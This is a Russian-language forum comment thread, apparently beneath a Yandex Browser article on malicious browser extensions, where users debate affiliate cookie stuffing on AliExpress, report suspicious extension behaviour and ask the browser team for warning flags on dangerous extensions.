                                                                                                                                                          1. Арбитраж трафика. C 15.12.2020 по 31.05.2021 включительно разрешены следующие виды покупного трафика:

                                                                                                                                                          Для России: facebook, myTarget, twitter, DV360 на веб. Яндекс и Google (веб и апп) — только РСЯ и Google Display Network (кроме Universal App Campaigns).
                                                                                                                                                          Для Белоруссии, Казахстана, Узбекистана: facebook, myTarget, twitter, DV360 на веб. Яндекс и Google (веб и апп) — только РСЯ и Google Display Network (кроме Universal App Campaigns).
                                                                                                                                                          Для остальных стран СНГ разрешены все виды арбитража трафика, кроме контекстной рекламы на бренд.
                                                                                                                                                          Контекстная реклама на бренд запрещена для трафика из всех стран. Также в оффере по-прежнему запрещена PV реклама (попапы, попандеры, бодиклик/кликандер) с непосредственным направлением трафика на партнерскую ссылку. При желании, вебмастера могут закупать PV-трафик на собственные промежуточные лендинги-витрины.

                                                                                                                                                          2. Купонные сайты, сайты-агрегаторы скидок и промокодов.

                                                                                                                                                          3. Партнерские сети, инструменты CPA-монетизации сайтов, платформы лидогенерации.

                                                                                                                                                          4. Браузерные расширения.

                                                                                                                                                          Поэтому Aliexpress это очевидно устраивает.

                                                                                                                                                          Такая возможность есть. И они ее запретили использовать видимо не просто так.

                                                                                                                                                          Такая возможность есть и они ее не запрещали.

                                                                                                                                                          в партнерке останутся одни мошенники с неразрешенными видами трафика

                                                                                                                                                          Но они разрешены как видите. Если бы были не разрешены, то такого партнера быстро бы заблокировали и на этом все бы закончилось.

                                                                                                                                                          Самое важно тут, если расширение перехватывает чьи-то партнерские куки, то это означает, что оно забрало партнерские отчисления у того, кому они положены по правилам рекламодателя

                                                                                                                                                          Как видите они не запрещают трафик с расширений, значит тут такая же история как с кебшеком, который также забирает деньги у партнеров.

                                                                                                                                                          В любом случае, я говорю только с точки зрения пользователя. И для пользователя это как правило безобидная вещь в отличие от того что описано в посте или поднятия прокси, как в Hola.
                                                                                                                                                            +1
                                                                                                                                                            За исключением когда человек использует кешбек сервис. Это точно такая же ситуация: клиента никто не приводил, он пришел сам, но партнерское вознаграждение все равно было выплачено (а сервис поделился частью с покупателем)
                                                                                                                                                            Вы уж простите меня, что я повторяю, но вы совсем не понимаете что говорите. Вы повторяете свое видение ситуации, но оно ошибочно, хотя бы потому что вы учитываете только интересы покупателя. А есть еще интересы Алиэкспресс и других партнеров. Почему вы их не учитываете? Что бы использовать кэшбэк сервис вы должны его активировать. Само оно не выплатится вам. Это означает вам надо перейти по партнерской ссылке кэшбэк сервиса. И никак иначе. Нужен сознательный ваш клик. Без клика Алиэкспресс не выплатит комиссию за товар вашему кэшбэк сервисы, а они не выплатят вам.

                                                                                                                                                            Тут по сути тоже самое, только с покупателем никто не поделился. Так или иначе, это уже заложено в цене (если продавец не участвует в партнерской программе, то и вознаграждения не будет, т.е. решение принимает продавец и это обязательно будет отражено в цене).
                                                                                                                                                            Не то же самое. И почему вы опять оцениваете все с точки зрения только покупателя? Интересов магазина и других партнеров не существует или они тут не важны? Если нет сознательного клика, то и оплаты быть не должно. Еще раз. Все партнерки платят только и только за сознательные клики. Зачем им платить за человека, который уже сам к ним приходит без клика по ссылке партнера? На Алиэкспресс куки живут сутки (или трое), если не ошибаюсь, после клика по ссылке, именно для того, что бы партнеру не платить за последующие покупки, потому что покупатель уже приведен, нет необходимости платить за него еще раз. А вы, предлагая подобную монетизацию любого расширения, хотите что бы Алиэкспресс платил расширению, которое само вообще не приводило никого на Алиэкспресс. Улавливаете разницу для Алиэкспресс и других партнеров? Не видите тут кражи денег у них? В цене партнерские отчисления заложены, вы правы, но они выплачиваются только тем, кто их заслужил, то есть привел покупателя на сайт Алиэкспресс через сознательный клик. Все другие не имеют никакого права получать эти партнерские отчисления. Если расширение пытается таким способом монетизироваться, то есть самовольно без ведома покупателя подменяет ему куки, то это называется куки стаффингом. Найдите в Википедии и почитайте что это такое.

                                                                                                                                                            Вы привели условия программы Admitad. Это условия с 3 сентября. Я читал их пояснение к их расширению в каталоге Google раньше в этом году. Видимо правила поменялись. Но вы должны понимать, что речь идет о расширениях, у которых есть ссылки на Алиэкспресс в своем интерфейсе, а не, как вы написали в своем первом комментарии, делают перехват партнерских кук. Именно пеперехват — это куки стаффинг, это не сознательный клик. Если есть сознательный клик и если Адмитад разрешили трафик из расширений, то ради бога. Но вы завели разговор про перехват. А это уже воровство. Не у покупателей, а у Алиэкспресс и у других партнеров. Поставьте себя на место другого партнера. Вы сделали обзор чего-нибудь на Youtube. Человека вы заинтересовали, он перешел по вашей ссылке на Али, но ваша кука была перехвачена каким-нибудь расширением-прокси. Это расширение ничего не сделало для получения комиссии, но получило ее за вас. Какой смысл Али платить им, а не вам? Именно вы продвигаете Али посредством обзоров. А расширение-перехватчик ничего не сделало, но просто забрало ваши деньги. Как вы к этому отнесетесь?

                                                                                                                                                            Как видите они не запрещают трафик с расширений, значит тут такая же история как с кебшеком, который также забирает деньги у партнеров.
                                                                                                                                                            Надеюсь, у меня получилось объяснить и сейчас вы понимаете разницу.

                                                                                                                                                            В любом случае, я говорю только с точки зрения пользователя. И для пользователя это как правило безобидная вещь
                                                                                                                                                            Почему в ситуации, где есть 3 стороны, вы считаете уместным рассуждать только с точки зрения одной стороны и на основании только этого делать вывод о безобидности для всех сторон? Почему вы не берете в расчет сторону Алиэкспресс и других продавцов? Поставьте себя на их место и подумайте со всех сторон.
                                                                                                                                                              –1
                                                                                                                                                              хотя бы потому что вы учитываете только интересы покупателя

                                                                                                                                                              Я уже не раз писал что я говорю с точки зрения покупателя.

                                                                                                                                                              Что бы использовать кэшбэк сервис вы должны его активировать. Само оно не выплатится вам.

                                                                                                                                                              Это не всегда так. Можно поставить расширение кешбек сервиса, которое будет активировать кешбек при заходе на сайт. Принцип тот же самый.

                                                                                                                                                              Зачем им платить за человека, который уже сам к ним приходит без клика по ссылке партнера?

                                                                                                                                                              Кешбек это тоже оплата за человека, который сам приходит. От того, что пользователь нажал ссылку в кешбек сервисе он не становится новым клиентом. С точки зрения Алиэкспресса это такая же выплата за старого клиента. Не вижу в чем тут разница.

                                                                                                                                                              Вы привели условия программы Admitad

                                                                                                                                                              Я привел условия программы Aliexpress, которая расположена на Admitad. Условия заданы Aliexpress, а не Admitad.

                                                                                                                                                              Вы сделали обзор чего-нибудь на Youtube. Человека вы заинтересовали, он перешел по вашей ссылке на Али, но ваша кука была перехвачена каким-нибудь расширением-прокси.

                                                                                                                                                              Для блоггера это ничем не отличается от ситуации «перешел по ссылке на Али и воспользовался кешбек сервисом». Для Али это отличается только тем, что у людей будет меньше желания работать с их партнерской программой. Но если бы их это не устраивало, они бы запретили трафик с расширений, это ведь логично.

                                                                                                                                                              Есть такое расширение — Alitools, которое монетизируется подобным образом. Они предоставляют сервис мониторинга цен и другие подобные утилиты. У меня как у пользователя к ним претензий нет. В отличии от какой-нибудь Hola, которая поднимает локальный прокси и продает доступ неизвестно кому — это банально опасно. Вот и все что я пытаюсь донести, что для пользователя такой вид монетизации более безобиден. А не для других партнеров.
                                                                                                                                                                +1
                                                                                                                                                                Знаете, очень сложно пытаться объяснить что-то человеку, который не хочет понять. Я спрошу у вас еще раз. Почему вы говорите только с точки зрения покупателя, когда подмена куки для покупателя не вредна? Вот зачем вы все время на это давите? Я вам сразу сказал, что ваша точка зрения не полная и объяснил почему. Есть еще сам Али и есть другие участники партнерской программы. А вы все равно настаиваете на невинности такой монетизации, потому что для покупателя это не страшно. Я ваше мнение уловил изначально, но стал объяснять шире и полностью, что бы вы поняли в чем может быть воровство.
                                                                                                                                                                Можно поставить расширение кешбек сервиса, которое будет активировать кешбек при заходе на сайт.
                                                                                                                                                                Покажите кто так делает. Если они это делают без клика покупателя — это куки стаффинг. Теоретически, кэшбэк сервисы — это единственный вид сервиса, которому такое может быть разрешено делать автоматически. Но для этого нужно обычно отдельное разрешение для такого вида сервисов.

                                                                                                                                                                Кешбек это тоже оплата за человека, который сам приходит. От того, что пользователь нажал ссылку в кешбек сервисе он не становится новым клиентом. С точки зрения Алиэкспресса это такая же выплата за старого клиента. Не вижу в чем тут разница.

                                                                                                                                                                Кэшбэк — это оплата за человека, который сам приходит на Алиэкспресс, но обязательно сам изъявляет желание получить кэшбэк посредством клика на соответствующую ссылку в кэшбэк сервисе. Нет клика — не будет и кэшбэка. Разницу улавливаете? Тут нет разговора про новый это клиент это или старый. Тут есть разговор про кликнул или нет. Если кликнул, Алиэкспресс будет платить за старого или нового, не важно. Но что бы не платить всегда потом, есть срок действия кук.

                                                                                                                                                                Для блоггера это ничем не отличается от ситуации «перешел по ссылке на Али и воспользовался кешбек сервисом»
                                                                                                                                                                Я продолжну вашу мысль. «перешел по ссылке на Али и воспользовался кешбек сервисом обязательно кликнув на ссылку кэшбэк сервиса». А если какое-то расширение делает подмену кук без вашего клика, то это совершенно другая ситуация. В этом случае вы не изъявляете желание и куки меняются без вашего желания. Это и называется куки стаффингом. Плохое расширение в таком случае просто пользуется вашей безграмотностью. Вам на это все равно, вы всегда тут были правы, но не все равно Али и блогерам, которые работают с Али. Неужели так сложно уловить разницу?

                                                                                                                                                                Для Али это отличается только тем, что у людей будет меньше желания работать с их партнерской программой. Но если бы их это не устраивало, они бы запретили трафик с расширений, это ведь логично.
                                                                                                                                                                Нормально так вы сделали важность целой партнерской программы неважной. Это чуть ли не самый важный элемент в их продвижении. С ними работают десятки тысяч, если не сотни людей по партнерской программе.
                                                                                                                                                                Когда вы говорите «они бы запретили трафик с расширений», то уточняйте какой трафик. Тот трафик, когда пользователь изъявил желание и кликнул сам по ссылке или тот трафик, о котором вы изначально написали — подмена кук. Второй тип трафика нигде и никогда не будет разрешен. Поймите вы это уже наконец. Мне лень регистрироваться в их партнерской программе, но я готов вам отправиить 1000 долларов, если там нет запрета на куки стаффинг (подмену кук).
                                                                                                                                                                Alitools никогда не устанавливал, поэтому точно не скажу. Но если они делают именно подмену кук без вашего клика, то они мошенники. Напишите Алиэкспресс, опишите ситуацию и спросите сами. Если сложно с английским, то попросите оценить ситуацию директора Алиэкспресс тут на Хабре. Он может передать этот вопрос сотрудникам на оценку. Если у них есть в интерфейсе ссылка на Али, если Али разрешает трафик по ссылкам из расширения, если Alitools не подменяет куки какими-то способами, то никаких проблем — это не подмена кук.

                                                                                                                                                                То, что вы пытались сказать, я понял сразу. И именно поэтому стал объяснять вам, что ваша точка зрения не полная, а потому не может называться верной.
                                                                                                                                                                  –1
                                                                                                                                                                  Почему вы говорите только с точки зрения покупателя, когда подмена куки для покупателя не вредна?

                                                                                                                                                                  Вы может быть не понимаете о чем я говорю. Я лишь говорю о том, что пользователь не пользующийся кешбеком может безбоязненно поставить расширение, монетизируемое подобным образом, в отличие от обсуждаемого в статье или чего-то типа Hola. То есть пользователю с таким видом монетизации бороться не обязательно (если только оно у него кешбек не перехватывает).

                                                                                                                                                                  Для Али оно может быть вредно и у них есть способы борьбы с этим, которые они почему-то не используют (а именно запрет трафика с расширений (любого, опции «запретить кукистаффинг» я у affiliate платформ не видел, но очевидно что запрет всего трафика с расширений запретит и это), у кучи других партнерских программ такой трафик запрещен). Почему я не знаю, но логично предположить что оно не так им и мешает или выгода от такого трафика перевешивает недостатки. С точки зрения денежных затрат это ничем не отличается от кешбека — такая же оплата за старого пользователя.

                                                                                                                                                                  Нормально так вы сделали важность целой партнерской программы неважной.

                                                                                                                                                                  Я не делал важность партнерской программы неважной. Я не знаю какими целями руководствуется Aliexpress принимая трафик с расширений. Если у вас есть возможность можете сами у них спросить. Я бы вообще старался не тратить деньги на старых пользователей через партнерскую программу — лояльность можно удерживать другими способами, например купонами, баллами, которые потом можно потратить на оплату заказа (тот же кешбек) и так далее. Но я не работаю в Ali.

                                                                                                                                                                  Но если они делают именно подмену кук без вашего клика, то они мошенники.

                                                                                                                                                                  Я не знаю как обстоят дела на данный момент, но кешбек сервисы обычно вносят его в свой стоп лист по причине перехвата кешбека, а в интернете можно найти примерно такую информацию:
                                                                                                                                                                  Каждый раз, когда вы покупаете товар на Aliexpress, данное расширение модифицирует ссылку для получения кэшбека самим разработчиком.

                                                                                                                                                                  Лично я это не проверял, может быть это поклеп со стороны конкурентов. Как я и говорил, покупаю я с кешбеком из чистого профиля без расширений, а цены через это расширение проверяю в другом профиле, поэтому на личный опыт сослаться не могу.

                                                                                                                                                                  вот вам две статьи с расследованиями

                                                                                                                                                                  По вашим ссылкам расширения маскировались под другие используя их торговые наименования, это куда более очевидный залет и причина для удаления. Но вообще вопрос законности я тут не поднимаю, это сложная тема. Возможно если где-нибудь в пользовательском соглашении будет написано, что установка расширения означает согласие пользователя на отдачу партнерских отчислений автору расширения, то это будет законно. А может и нет, я не знаю и речь изначально вел не об этом.
                                                                                                                                                                    0
                                                                                                                                                                    но очевидно что запрет всего трафика с расширений запретит и это
                                                                                                                                                                    Запретить можно, но на примере статьи вы видите, что запретить — это одно, а трафик отправлять все равно будут пробовать.

                                                                                                                                                                    С точки зрения денежных затрат это ничем не отличается от кешбека — такая же оплата за старого пользователя.
                                                                                                                                                                    По условиям партнерских программ не за каждого старого пользователя нужно платить.

                                                                                                                                                                    Я бы вообще старался не тратить деньги на старых пользователей через партнерскую программу — лояльность можно удерживать другими способами, например купонами, баллами, которые потом можно потратить на оплату заказа (тот же кешбек) и так далее.

                                                                                                                                                                    Тут дело не в лояльности покупателей, а в том, что если не платить блогерам и другим в том числе и за старых покупателей, то все эти люди будут рекламировать другие площадки.

                                                                                                                                                                    Лично я это не проверял, может быть это поклеп со стороны конкурентов
                                                                                                                                                                    Сомневаюсь, что Мегабонус будут делать поклеп. Просмотрел отзывы у расширения Alitools. Похоже проблема действительно есть. Отзывы о краже кэшбэка периодически-постоянно появляются. По сути это воровство денег у доверчивых пользователей. Приведенные ваши две ссылки не единственные, где говорят о подмене кук с их стороны.

                                                                                                                                                                    Но вообще вопрос законности я тут не поднимаю, это сложная тема.
                                                                                                                                                                    Это не сложная тема. Тут все просто и понятно. Представьте, что вы блогер или владелец партнерки и все станет просто.

                                                                                                                                                                    Возможно если где-нибудь в пользовательском соглашении будет написано, что установка расширения означает согласие пользователя на отдачу партнерских отчислений автору расширения, то это будет законно.
                                                                                                                                                                    Нет, это не станет законным. Более того, это будет самопризнанием мошенничества. Правила расширения не могут быть важнее правил партнерской программы, от которой они получают деньги, и закона.
                                                                                                                                                                  0
                                                                                                                                                                  Если вам нужны еще доказательства, что расширения, которые делают подмену кук, нелегитимны, то вот вам две статьи с расследованиями, в результате которых расширения были удалены из каталога Google.
                                                                                                                                                                  www.zdnet.com/article/google-removes-two-chrome-ad-blocker-extensions-caught-cookie-stuffing
                                                                                                                                                                  www.express.co.uk/life-style/science-technology/1319293/Google-Chrome-warning-browser-issue-malicious-extensions
                                                                                                                                                      +1
                                                                                                                                                      А попросить оплатить не пробовали?
                                                                                                                                                      В Chrome Web Store платные расширения вполне себе бывают.
                                                                                                                                                      Ну и например за AdGuard VPN (в браузере у меня именно расширение от них — выборочно умеет заворачивать трафик от нужных сайтов на их VPN) я плачу, точнее за сам AdGuard VPN.
                                                                                                                                                        0
                                                                                                                                                        Я вас умоляю… народ ноет купить приложеньку в маркете за 100р :)
                                                                                                                                                          0
                                                                                                                                                          я б сказал, что это разрабы каждую секунду ноют у тебя в браузере, почте и на сайтах заплати мне всего 10* рублей, ну что ты бедный что ли…
                                                                                                                                                          При том что почти никогда не понятно зачем тебе эта фигня и как долго она будет работать так же как на данный момент… но ноют беспрерывно
                                                                                                                                                        0

                                                                                                                                                        Я мог бы с Вами согласиться, если бы всегда пользовался безлимитны сверхскоростным интернетом с восьмиядерного ПК. Но моя реальность не всегда совпадает с таким положением дел — порой приходится сидеть с атома по каналу, раздаваемому со смартфона где-то вдали от крупных городов.

                                                                                                                                                      –1
                                                                                                                                                      У меня «friGate3 proxy helper» с месяц как начал жрать процессор при старте браузера. Я так и подумал, что встроили какую-то отправку статистики за предыдущий день. Сейчас вынес его в отдельный профиль от греха подальше.
                                                                                                                                                        +56

                                                                                                                                                        После прочтения статьи первое впечатление от заголовка поменялось с «П — произвол» на «З — забота». Ваша статья — пример хорошей работы с сообществом. Вы молодцы, так держать!

                                                                                                                                                          +7
                                                                                                                                                          Вставлю свои 5 копеек. Я использовал Frigate в Google Chrome ввиду наличия матери, которой нужно иногда заходить на сайт Одноклассники… При этом, у меня установлен Bitdefender Total Security, который в какой-то момент, стал блокировать «подозрительное подключение». Дело было еще в июне. Решил я раскопать, начал с отключения дополнений, и именно после Frigate пропали регулярные сообщения от антивируса с жалобой на 1 и тот же IP, больше всего прожил 188.165.30.217, но он пару раз менялся. Вернул назад Frigate, Bitdefender снова стал ругаться раз в пару часов. Я вооружился Wireshark, и выследил пакет с точной такими же данными как и Вас в статье. Так что, случай действительно имеет место быть, и продолжается это уже долго. Но дополнение так и висит в магазинах.
                                                                                                                                                            +1

                                                                                                                                                            Такая активность Savefrom.net только на хроме или на огнелисе тоже есть?

                                                                                                                                                              0
                                                                                                                                                              Я его использовал на FF и один раз словил непонятно откуда заигравшую рекламу, причём расширение не устанавливал, просто была открыта вкладка.
                                                                                                                                                              +5
                                                                                                                                                              SaveFrom.net уже не первый раз всплывает habr.com/ru/company/globalsign/blog/460987 Я даже отзыв на мозилла аддонс оставил, на что мне ответили «мы ничего не собираем».
                                                                                                                                                                +1
                                                                                                                                                                Учитывая сколько «темных паттернов» у них на сайте, засранном рекламой, то не удивительно.
                                                                                                                                                                  +4
                                                                                                                                                                  Самое забавное, что некоторое время пользовался этим расширением. Увидев что оно совершенно бесплатное, но при этом круто помогает в скачивании видео с ютуба, я решил поискать ссылку на офф. сайте для доната. Когда не нашёл такой, отписал им на почту что хочу немного задонатить, чтобы они не голодали и развивали расширение. Но мне ответили, что донатов им не надо. Вот тут я насторожился и на всякий случай удалил расширение. Теперь я понял, в чём подвох
                                                                                                                                                                    0
                                                                                                                                                                    Я ведь тоже не нашел, куда донатить, но не выкупил, почему. И реклама воспроизводилась, и был период, когда проц подгружало безумно (но я тогда грешил на майнера, потому что кулер орал как сумасшедший). В общем, картинка сложилась.
                                                                                                                                                                  +3
                                                                                                                                                                  Мне одному потенциальная вредоносность этих расширений была очевидна с самого начала?
                                                                                                                                                                    +15
                                                                                                                                                                    Уважаемые разработчики Яндекс. Пожалуйста добавьте в раздел расширений браузера флажек к каждому расширению, которое является НЕ ЖЕЛАТЕЛЬНЫМ.
                                                                                                                                                                    Чтобы те кто случайно включил его или установил уже потом, те кто НЕ знаком с информацией о том что расширение опасно. Добавьте маркера в скисок расширений к каждому такому расширению.!!!
                                                                                                                                                                      +5
                                                                                                                                                                      Спасибо, подумаем, как лучше сделать, да.
                                                                                                                                                                        0

                                                                                                                                                                        А способа запретить eval внутри расширений нет? Ну или у себя внутри всех любителей eval в «подозрительные» записывать.

                                                                                                                                                                          0
                                                                                                                                                                          Наверно нет. Все потому что каждые 2 из 3 будут иметь этот eval.
                                                                                                                                                                          Расширения для браузера это не скрипт по анимации фоток слева направо. Расширения изначально рассчитаны на то что будут парсить страницу и искать то ли рекламу, то ли скрипты и то режим видимости вставлять в сообщения ВК.
                                                                                                                                                                          В общем все расширения это каталог костылей которые подставляют под браузер. Модифицирующие браузер и сайты.
                                                                                                                                                                          0
                                                                                                                                                                          Еще просьба большая. К первой чтобы маркировать расширения в списке установленных прежде флашками о том что они подозрительные.
                                                                                                                                                                          Добавьте пожалуйста сообщение в банер при попытке установить подозрительное расширение.
                                                                                                                                                                          Я многократно пытался установить расширения из ChromeExtensions многократно было сообщение «Установить НЕ УДАЛОСЬ».
                                                                                                                                                                          Не понятно Почему не удалось, куда не удалось, зачем не удалось?
                                                                                                                                                                          Очень много расширений например таких как замораживатели вкладок, половина таких расширений не может установится.
                                                                                                                                                                          Ни сообщения нет, ни причин почему не устанавливается.
                                                                                                                                                                            0

                                                                                                                                                                            А можете примеры таких замораживателей дать, пожалуйста? Посмотрим. что с ними не так.

                                                                                                                                                                              0
                                                                                                                                                                              Это только некоторые из замораживающих вкладки, но мне очень много попадались выполняющих другие функции.
                                                                                                                                                                              chrome.google.com/webstore/detail/taboptimizer/cgcmkbkicaeljmcbmblchikjmmlokfag
                                                                                                                                                                              chrome.google.com/webstore/detail/freetabmemory/ehbifmnhnghckaobolojbabkagnhjajm
                                                                                                                                                                              chrome.google.com/webstore/detail/tabmemoryoptimizer/mjillkibdjeflldljbgaemfpencpfgkg
                                                                                                                                                                              chrome.google.com/webstore/detail/tabbooster/fajpbonghcpkhjiiebgdklnkndgjjcch

                                                                                                                                                                              Я пару раз писал об этом в службу поддержки браузера, мне отвечали что мол это защита браузера.
                                                                                                                                                                                0
                                                                                                                                                                                Набор из подобных (в том числе этих) расширений устанавливался через устрашающие лендинги — типа «нажми скорее чтобы ускорить», «у тебя все тормозит», «у тебя вирусы и все тормозит» и т.д. и затем примерно через месяц использования расширения начинали нехорошую деятельность. Это выражалось, например, в том, что на других сайтах они могли отрисовывать окно о том, что «у вас есть возврат ндс», клик на которое вел на сайт, который мог увести у вас деньги.
                                                                                                                                                                                0
                                                                                                                                                                                Извените, еще маленькая просьба, не в тему.
                                                                                                                                                                                Не знаю кому написать, так как служба поддержки игнорирует.
                                                                                                                                                                                Добавить режим отображения ссылок в панели избранного в виде только лишь иконок.
                                                                                                                                                                                Очевидно что у каждого сайта иконки разные, одной иконки достаточно чтобы было ясно что за ссылка. При этом на панели поместится в 4 раза больше иконок.
                                                                                                                                                                                На андроиде есть режим отображения иконок на рабочем столе без подписей. А ваш браузер режим показа панели избранного такого не умеет.
                                                                                                                                                                                  0
                                                                                                                                                                                  А можно же просто вручную пустое имя поставить нужным закладкам?
                                                                                                                                                                                    0
                                                                                                                                                                                    На текущий момент я так и делаю.
                                                                                                                                                                                    Но при группировке или при открытии браузера в узком оконном режиме, ссылки открываются в виде выпадающего списка без названий. А самое главное по таким ссылкам производить поиск НЕ возможно!
                                                                                                                                                                                      0
                                                                                                                                                                                      У меня какое то расширение что то мутит.
                                                                                                                                                                                      Когда я перехожу по ссылке скачать Tox, Electrum, яндекс.Деньги с магазина play.google.com то с этих переходов почему то открывается страница одного и того же кошелька play.google.com/store/apps/details?id=ru.cupis.wallet
                                                                                                                                                                                      Какое то расширение подменяет ссылку.
                                                                                                                                                                                      Расширений много.
                                                                                                                                                                                      Все таки сделайте маркер «опасно!» в списке расширений напротив подозрительных расширений.
                                                                                                                                                                                      .
                                                                                                                                                                                      И! Еще есть такая проблема, в списке расширений браузера нет ссылки на страницу расширения в каталоге расширений.
                                                                                                                                                                                      Проходит время, забываю что расширение означает, а искать его по хешу в каталоге практически нет возможности. часто по одному названию не понятно что расширение означает.
                                                                                                                                                                                        0
                                                                                                                                                                                        Если бы мы знали, какое расширение подозрительное, мы бы его забанили.

                                                                                                                                                                                        Насчет ссылки мысль хорошая, спасибо. Сейчас она есть в контекстном меню, которое возникает, если кликнуть по иконке расширения на тулбаре браузера.
                                                                                                                                                                                          0
                                                                                                                                                                                          Здравствуйте. Я очень хочу найти зловредные расширения путем исключения.
                                                                                                                                                                                          У меня раширенний более 200, только ~70 из них включены. Остальные как бы могут пригодится на будущее.
                                                                                                                                                                                          Зачем так много, там по пару расширений для каждой функции в результате много получилось, парочку для дебага Juqery, парочку для Ajax запросов, парочку для просмотра видео popup.

                                                                                                                                                                                          Чтобы найти зловредное расширение я решил воспользоватся
                                                                                                                                                                                          chrome.google.com/webstore/detail/extensions-switcher/mapmknaogodpakjopdhmdcilahbfbjpc
                                                                                                                                                                                          этим расширением.
                                                                                                                                                                                          Оно позволяет группировать расширения и отключать сразу группу расширений. Кстати это в будущем позволило держать не 70 расширений включенных а только 10.
                                                                                                                                                                                          Проблема в том что это расширение работает в других браузерах.
                                                                                                                                                                                          А в Вашем браузере постоянно выскакивает коно защиты на подтверждение, блокируя весь функционал.
                                                                                                                                                                                          Таким образом я не могу найти звловредное расширение, так как браузер блокирует расширение которое я установил.
                                                                                                                                                                                          .
                                                                                                                                                                                          Что мне делать посоветуете? Как мне найти зловредное расширение? Какой менеджер расширений мне порекомендуете чтобы я помог себе и вам обнаружить зловред?